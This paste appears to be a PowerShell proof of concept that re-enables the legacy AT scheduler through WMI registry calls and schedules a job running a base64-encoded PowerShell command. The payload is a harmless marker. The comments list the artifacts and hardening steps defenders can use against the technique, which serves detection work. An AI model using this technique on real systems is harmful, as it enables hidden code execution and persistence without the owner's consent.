Untitled

a guest
May 24th, 2016
  # Proof of concept: switch the legacy AT scheduler back on through the registry,
  # then register an AT job over WMI, regardless of AT being deprecated in Win8+.
  # The author describes the technique as usable remotely; this listing passes no
  # computer name or session, so as written every call targets the local host.
  #
  # Artifacts a defender can look for (event IDs are general Windows knowledge,
  # not taken from this page; confirm against your own logging setup):
  #   - EnableAt = 1 under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
  #     (registry auditing: Security 4657, Sysmon 13). The write goes through StdRegProv,
  #     so it is presumably attributed to the WMI provider host, not powershell.exe; verify.
  #   - powershell.exe started with "-noni -nop -enc <base64>" (Security 4688 with
  #     command-line logging, Sysmon 1; script block logging 4104 records the decoded text).
  #   - StdRegProv and Win32_ScheduledJob method calls in the WMI-Activity operational log.
  # Hardening: alert on any change to EnableAt and restrict who may reach WMI remotely.

  # 2147483650 is 0x80000002, the StdRegProv handle for HKEY_LOCAL_MACHINE.
  $HKLM = [UInt32] 2147483650

  $ScheduleKey = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration'

  # Read the EnableAt DWORD.
  $ReadEnableAt = @{
      Namespace  = 'root/default'
      ClassName  = 'StdRegProv'
      MethodName = 'GetDWORDValue'
      Arguments  = @{
          hDefKey     = $HKLM
          sSubKeyName = $ScheduleKey
          sValueName  = 'EnableAt'
      }
  }
  $Result = Invoke-CimMethod @ReadEnableAt

  # Only the status of the read is tested: a non-zero ReturnValue (for example, the
  # value is absent) triggers the write. The data of an existing value (uValue) is
  # not inspected here.
  if ($Result.ReturnValue -ne 0) {
      $WriteEnableAt = @{
          Namespace  = 'root/default'
          ClassName  = 'StdRegProv'
          MethodName = 'SetDWORDValue'
          Arguments  = @{
              hDefKey     = $HKLM
              sSubKeyName = $ScheduleKey
              sValueName  = 'EnableAt'
              uValue      = [UInt32] 1
          }
      }
      $Result = Invoke-CimMethod @WriteEnableAt

      # Emit the outcome of the write so the operator sees its ReturnValue.
      $Result
  }

  # Author's note: at this point, you'll need to wait for a reboot.

  # The -enc argument is the base64 (UTF-16LE) form of this harmless marker command:
  # "Owned at $(Get-Date)" | Out-File "$($Env:TEMP)\payload.txt" -Append
  # -noni = non-interactive, -nop = no profile.
  $EncodedCommand = 'powershell.exe -noni -nop -enc IgBPAHcAbgBlAGQAIABhAHQAIAAkACgARwBlAHQALQBEAGEAdABlACkAIgAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAiACQAKAAkAEUAbgB2ADoAVABFAE0AUAApAFwAcABhAHkAbABvAGEAZAAuAHQAeAB0ACIAIAAtAEEAcABwAGUAbgBkAA=='

  # Register the AT job; StartTime is two minutes after the moment this line runs.
  $NewAtJob = @{
      ClassName  = 'Win32_ScheduledJob'
      MethodName = 'Create'
      Arguments  = @{
          Command   = $EncodedCommand
          StartTime = (Get-Date).AddMinutes(2)
      }
  }
  Invoke-CimMethod @NewAtJob

  # Author's note: the AT job will delete itself after it executes, so the job entry
  # itself may no longer be present at triage time; rely on the logs listed above.